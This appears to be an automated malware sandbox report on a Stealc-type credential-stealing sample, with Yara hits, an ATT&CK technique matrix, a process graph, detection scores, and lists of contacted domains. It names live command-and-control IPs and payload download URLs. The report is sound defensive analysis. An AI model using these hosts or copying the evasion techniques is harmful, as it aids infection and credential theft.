                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 0.2.8ObkdHP9Hq.exe.880000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.skotes.exe.da0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.skotes.exe.da0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1710668999.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1787122372.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2313808544.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1746151860.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1750861605.0000000000881000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.2953823488.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2951418045.0000000001088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000004E.00000002.2953026392.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 84d280a9e8.exe PID: 7884, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 84d280a9e8.exe PID: 6488, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 84d280a9e8.exe PID: 5996, type: MEMORYSTR
                                Source: Yara matchFile source: 20.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 44.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 44.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.2430826993.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.2630993454.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000000.2616219253.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2442182169.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: num.exe PID: 2488, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: num.exe PID: 6516, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: 84d280a9e8.exeBinary or memory string: WIN_81
                                Source: 84d280a9e8.exeBinary or memory string: WIN_XP
                                Source: random[1].exe.5.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                Source: 84d280a9e8.exeBinary or memory string: WIN_XPe
                                Source: 84d280a9e8.exeBinary or memory string: WIN_VISTA
                                Source: 84d280a9e8.exeBinary or memory string: WIN_7
                                Source: 84d280a9e8.exeBinary or memory string: WIN_8

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 00000019.00000002.2953823488.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2951418045.0000000001088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000004E.00000002.2953026392.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 84d280a9e8.exe PID: 7884, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 84d280a9e8.exe PID: 6488, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 84d280a9e8.exe PID: 5996, type: MEMORYSTR
                                Source: Yara matchFile source: 20.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 44.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 44.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.2430826993.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.2630993454.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000000.2616219253.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2442182169.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: num.exe PID: 2488, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: num.exe PID: 6516, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BA1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_00BA1204
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00BA1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00BA1806
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts
                                11
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                Exploitation for Privilege Escalation
                                131
                                Disable or Modify Tools
                                21
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                12
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts11
                                Native API
                                2
                                Valid Accounts
                                1
                                DLL Side-Loading
                                11
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol21
                                Input Capture
                                21
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter
                                1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                3
                                Obfuscated Files or Information
                                Security Account Manager2
                                File and Directory Discovery
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Scheduled Task/Job
                                11
                                Registry Run Keys / Startup Folder
                                21
                                Access Token Manipulation
                                12
                                Software Packing
                                NTDS339
                                System Information Discovery
                                Distributed Component Object ModelInput Capture114
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                PowerShell
                                Network Logon Script112
                                Process Injection
                                1
                                DLL Side-Loading
                                LSA Secrets871
                                Security Software Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Scheduled Task/Job
                                11
                                Masquerading
                                Cached Domain Credentials461
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                                Registry Run Keys / Startup Folder
                                2
                                Valid Accounts
                                DCSync13
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job461
                                Virtualization/Sandbox Evasion
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                                Process Injection
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527565 Sample: 8ObkdHP9Hq.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 90 sergei-esenin.com 2->90 92 licendfilteo.site 2->92 94 8 other IPs or domains 2->94 116 Multi AV Scanner detection for domain / URL 2->116 118 Suricata IDS alerts for network traffic 2->118 120 Found malware configuration 2->120 122 18 other signatures 2->122 9 skotes.exe 3 22 2->9         started        14 8ObkdHP9Hq.exe 5 2->14         started        16 84d280a9e8.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 106 185.215.113.43, 49788, 49804, 49836 WHOLESALECONNECTIONSNL Portugal 9->106 108 185.215.113.103, 49810, 49842, 49879 WHOLESALECONNECTIONSNL Portugal 9->108 78 C:\Users\user\AppData\...\9d7da53f74.exe, PE32 9->78 dropped 80 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->80 dropped 82 C:\Users\user\AppData\...\84d280a9e8.exe, PE32 9->82 dropped 88 3 other malicious files 9->88 dropped 150 Creates multiple autostart registry keys 9->150 152 Hides threads from debuggers 9->152 154 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->154 20 9d7da53f74.exe 9->20         started        24 84d280a9e8.exe 9->24         started        26 num.exe 13 9->26         started        84 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->84 dropped 86 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->86 dropped 156 Detected unpacking (changes PE section rights) 14->156 158 Tries to evade debugger and weak emulator (self modifying code) 14->158 160 Tries to detect virtualization through RDTSC time measurements 14->160 28 skotes.exe 14->28         started        162 Binary is likely a compiled AutoIt script file 16->162 164 Excessive usage of taskkill to terminate processes 16->164 30 taskkill.exe 16->30         started        32 taskkill.exe 16->32         started        34 taskkill.exe 16->34         started        38 20 other processes 16->38 166 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->166 36 taskkill.exe 18->36         started        file6 signatures7 process8 dnsIp9 96 sergei-esenin.com 104.21.53.8, 443, 61043, 61190 CLOUDFLARENETUS United States 20->96 98 steamcommunity.com 104.102.49.254, 443, 61026, 61176 AKAMAI-ASUS United States 20->98 124 Antivirus detection for dropped file 20->124 126 Multi AV Scanner detection for dropped file 20->126 128 Detected unpacking (changes PE section rights) 20->128 148 3 other signatures 20->148 130 Binary is likely a compiled AutoIt script file 24->130 132 Found API chain indicative of sandbox detection 24->132 134 Excessive usage of taskkill to terminate processes 24->134 40 chrome.exe 24->40         started        43 taskkill.exe 1 24->43         started        45 taskkill.exe 1 24->45         started        55 3 other processes 24->55 100 185.215.113.37, 49854, 61131, 61184 WHOLESALECONNECTIONSNL Portugal 26->100 136 Found evasive API chain (may stop execution after checking locale) 26->136 138 Searches for specific processes (likely to inject) 26->138 140 Machine Learning detection for dropped file 28->140 142 Tries to evade debugger and weak emulator (self modifying code) 28->142 144 Hides threads from debuggers 28->144 146 Potentially malicious time measurement code found 28->146 47 conhost.exe 30->47         started        49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        53 conhost.exe 36->53         started        57 20 other processes 38->57 signatures10 process11 dnsIp12 102 192.168.2.4, 138, 443, 49186 unknown unknown 40->102 104 239.255.255.250 unknown Reserved 40->104 59 chrome.exe 40->59         started        62 chrome.exe 40->62         started        64 chrome.exe 40->64         started        76 4 other processes 40->76 66 conhost.exe 43->66         started        68 conhost.exe 45->68         started        70 conhost.exe 55->70         started        72 conhost.exe 55->72         started        74 conhost.exe 55->74         started        process13 dnsIp14 110 youtube-ui.l.google.com 142.250.181.238, 443, 49860 GOOGLEUS United States 59->110 112 www.google.com 142.250.184.228, 443, 49886 GOOGLEUS United States 59->112 114 5 other IPs or domains 59->114

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                8ObkdHP9Hq.exe53%ReversingLabsWin32.Packed.Generic
                                8ObkdHP9Hq.exe57%VirustotalBrowse
                                8ObkdHP9Hq.exe100%AviraTR/Crypt.TPM.Gen
                                8ObkdHP9Hq.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe100%AviraTR/Crypt.ZPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.ZPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1000336001\num.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe24%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe29%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe83%ReversingLabsWin32.Trojan.Stealc
                                C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe24%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1000336001\num.exe83%ReversingLabsWin32.Trojan.Stealc
                                C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe29%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Packed.Generic
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                youtube-ui.l.google.com0%VirustotalBrowse
                                steamcommunity.com0%VirustotalBrowse
                                www3.l.google.com0%VirustotalBrowse
                                play.google.com0%VirustotalBrowse
                                sergei-esenin.com4%VirustotalBrowse
                                www.google.com0%VirustotalBrowse
                                youtube.com0%VirustotalBrowse
                                bathdoomgaz.store1%VirustotalBrowse
                                spirittunek.store1%VirustotalBrowse
                                studennotediw.store1%VirustotalBrowse
                                licendfilteo.site1%VirustotalBrowse
                                accounts.youtube.com0%VirustotalBrowse
                                eaglepawnoy.store1%VirustotalBrowse
                                www.youtube.com0%VirustotalBrowse
                                mobbipenju.store1%VirustotalBrowse
                                clearancek.site1%VirustotalBrowse
                                dissapoiznw.store1%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                https://player.vimeo.com0%URL Reputationsafe
                                https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
                                https://policies.google.com/terms/service-specific0%URL Reputationsafe
                                https://g.co/recover0%URL Reputationsafe
                                https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                                https://support.google.com/websearch/answer/4358949?hl=ko&ref_topic=32850720%URL Reputationsafe
                                https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                                http://185.215.113.37100%URL Reputationmalware
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                                https://policies.google.com/technologies/cookies0%URL Reputationsafe
                                http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                                https://policies.google.com/terms0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                                https://policies.google.com/terms/location0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                                https://steam.tv/0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                                https://apis.google.com/js/api.js0%URL Reputationsafe
                                http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                                https://store.steampowered.com/points/shop/0%URL Reputationsafe
                                https://lv.queniujq.cn0%URL Reputationsafe
                                https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                                https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                                https://checkout.steampowered.com/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
                                https://policies.google.com/privacy0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                                https://store.steampowered.com/;0%URL Reputationsafe
                                https://store.steampowered.com/about/0%URL Reputationsafe
                                http://185.215.113.37/100%URL Reputationmalware
                                https://play.google/intl/0%URL Reputationsafe
                                https://families.google.com/intl/0%URL Reputationsafe
                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
                                https://policies.google.com/technologies/location-data0%URL Reputationsafe
                                https://help.steampowered.com/en/0%URL Reputationsafe
                                https://bathdoomgaz.store:443/api14%VirustotalBrowse
                                https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
                                http://185.215.113.103/luma/random.exe21%VirustotalBrowse
                                https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                                http://185.215.113.103/test/num.exe25%VirustotalBrowse
                                https://community.akamai.steamstatic.com/public/css/ski0%VirustotalBrowse
                                https://sergei-esenin.com/0%VirustotalBrowse
                                https://play.google.com/work/enroll?identifier=0%VirustotalBrowse
                                https://www.youtube.com0%VirustotalBrowse
                                https://community.akamai.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&amp;l=engli0%VirustotalBrowse
                                https://www.google.com0%VirustotalBrowse
                                https://www.youtube.com/t/terms?chromeless=1&hl=0%VirustotalBrowse
                                http://185.215.113.43/Zu7JuNko/index.php18%VirustotalBrowse
                                http://185.215.113.37/e2b1563c6670f193.phpu17%VirustotalBrowse
                                http://185.215.113.43/Zu7JuNko/index.phpncoded12%VirustotalBrowse
                                https://www.google.0%VirustotalBrowse
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                youtube-ui.l.google.com
                                142.250.181.238
                                truefalseunknown
                                steamcommunity.com
                                104.102.49.254
                                truefalseunknown
                                www3.l.google.com
                                142.250.184.238
                                truefalseunknown
                                play.google.com
                                172.217.16.206
                                truefalseunknown
                                www.google.com
                                142.250.184.228
                                truefalseunknown
                                sergei-esenin.com
                                104.21.53.8
                                truetrueunknown
                                youtube.com
                                142.250.185.142
                                truefalseunknown
                                bathdoomgaz.store
                                unknown
                                unknownfalseunknown
                                spirittunek.store
                                unknown
                                unknownfalseunknown
                                licendfilteo.site
                                unknown
                                unknowntrueunknown
                                studennotediw.store
                                unknown
                                unknownfalseunknown
                                mobbipenju.store
                                unknown
                                unknownfalseunknown
                                eaglepawnoy.store
                                unknown
                                unknownfalseunknown
                                accounts.youtube.com
                                unknown
                                unknownfalseunknown
                                www.youtube.com
                                unknown
                                unknownfalseunknown
                                clearancek.site
                                unknown
                                unknowntrueunknown
                                dissapoiznw.store
                                unknown
                                unknownfalseunknown
                                NameMaliciousAntivirus DetectionReputation
                                http://185.215.113.43/Zu7JuNko/index.phptrueunknown
                                https://steamcommunity.com/profiles/76561199724331900true
                                • URL Reputation: malware
                                unknown
                                http://185.215.113.37/true
                                • URL Reputation: malware
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://player.vimeo.com9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65E9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://bathdoomgaz.store:443/api9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://steamcommunity.com/?subsection=broadcasts9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://185.215.113.103/luma/random.exeskotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://185.215.113.37/LaJonum.exe, 0000002C.00000002.2630021156.00000000005C6000.00000004.00000020.00020000.00000000.sdmptrue
                                    unknown
                                    http://185.215.113.103/test/num.exeskotes.exe, 00000005.00000002.2953123746.0000000000B38000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    https://community.akamai.steamstatic.com/public/css/ski9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CE4000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    https://sergei-esenin.com/9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    https://play.google.com/work/enroll?identifier=chromecache_161.19.drfalseunknown
                                    https://policies.google.com/terms/service-specificchromecache_161.19.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://g.co/recoverchromecache_161.19.drfalse
                                    • URL Reputation: safe
                                    unknown
